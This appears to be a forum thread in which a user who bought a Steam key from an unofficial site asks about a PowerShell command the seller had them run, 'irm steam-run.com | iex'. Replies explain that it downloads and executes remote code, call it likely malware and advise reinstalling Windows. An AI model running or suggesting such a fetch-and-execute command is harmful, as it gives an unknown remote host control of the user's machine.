I BOUGHT KEY FROM CHINESE WEBSITE THEN HE ASKED ME TO RUN POWERSHELL COMMAND IRM STEAM-RUN.COM | IEX THEN IT SHOWS SOME CHINESE CHARACTOR . I REMOVED AND COMPLETE UNINSTALL STEAM THEM REINSTALL IT. CAN ANYONE TELL ME WHAT IS THIS COMMAND OR HOW RISKY IT IS?

It's a script that will run and execute *something* ... I assume it's malware.
In PowerShell, you can use the Invoke-RestMethod (irm) command to download a script from a URL and execute it with Invoke-Expression (iex). This is a common approach for running scripts directly from the web.

PD: Can't you just be normal and buy keys from licit websites or directly on Steam?

I suggest you chargeback this fraudulent purchase. You bought a pirated copy.

Reinstallation of Steam is not enough to get rid of this malware. Format your drive and reinstall Windows.
